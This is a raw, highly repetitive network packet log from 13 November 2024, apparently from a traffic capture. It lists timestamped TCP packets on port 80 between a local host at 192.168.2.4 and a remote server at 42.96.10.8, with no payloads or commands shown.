                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554248095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554264069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554275036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554275036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554280043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554296970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554311991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554384947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554399014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554414034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554425001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554430008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554445982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554446936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554472923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554491043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554492950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554493904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554505110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554519892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554534912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554548979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554572105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554572105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554574966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554590940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554606915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554620028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554641008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554657936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554675102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554675102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554682016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554697037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554712057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554727077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554742098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554743052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554759979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554775953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554790974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554806948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554841042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554841042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554841042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554858923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554874897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554888010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554902077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554918051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554932117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554948092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554960012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554960012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554960012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554986000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.554999113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555011988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555027008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555037022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555052996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555059910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555069923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555102110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555114985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555393934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555409908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555425882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555541039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555567980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555577040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555592060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555620909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555634022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555648088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555661917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555677891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555680037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555718899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555733919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555748940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555763006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555783033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555783033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555804968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555824041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555840015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555855989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555866003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555871010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555876970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555887938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555905104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555944920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555954933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555968046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555982113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.555998087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556003094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556003094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556021929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556040049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556056023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556058884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556071997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556088924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556102991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556118011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556118965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556118965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556134939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556149006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556196928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556205988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556221962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556236029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556245089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556250095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556266069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556271076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556281090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556303978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556303978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556308985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556324005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556339979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556365013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556375980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556379080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556406021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556421041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556435108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556452036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556456089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556456089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556467056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556468010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556494951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556509018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556523085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556539059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556541920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556541920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556554079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556559086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556581974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556597948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556612015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556619883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556627989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556667089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556798935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556859016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556865931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.556881905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.559180021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594806910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594825029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594841003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594903946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594918966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594933987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594948053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594948053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594959974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594976902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.594990969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595006943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595017910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595017910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595037937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595051050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595067978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595082998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595108032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595123053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595159054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595201015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595216036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595232010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595247030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595258951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595258951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595263958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.595359087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626795053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626830101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626857042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626872063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626899958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626914978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626931906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626946926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626960039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626960039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626960039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626961946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626979113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.626995087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627002954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627007961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627026081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627043009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627048016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627048016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.627095938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635229111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635272980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635288000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635304928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635308027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635334015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635350943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.635353088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636347055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636351109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636513948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636528015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636543036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636559010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636574030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636590958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636616945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636616945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.636616945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.637454987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.655814886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.655832052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.655867100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.657454014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658747911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658765078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658781052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658798933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658813953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658828020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658828020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658838987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658858061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658874035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658879042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658890963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658910990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658946991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658963919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658967972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.658982038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659008026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659024000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659054041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659054041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659060001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659076929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659091949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659163952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659228086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659243107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659272909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659272909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659347057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659363031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659379005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659398079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659406900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659424067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659436941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659462929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659477949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659477949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659480095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659497976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659513950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659518957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659554958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659601927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659682989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659696102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659720898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659735918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659751892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659780979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659780979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659780979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659853935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659893990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659909964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659955025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659955025 CET4973380192.168.2.442.96.10.8
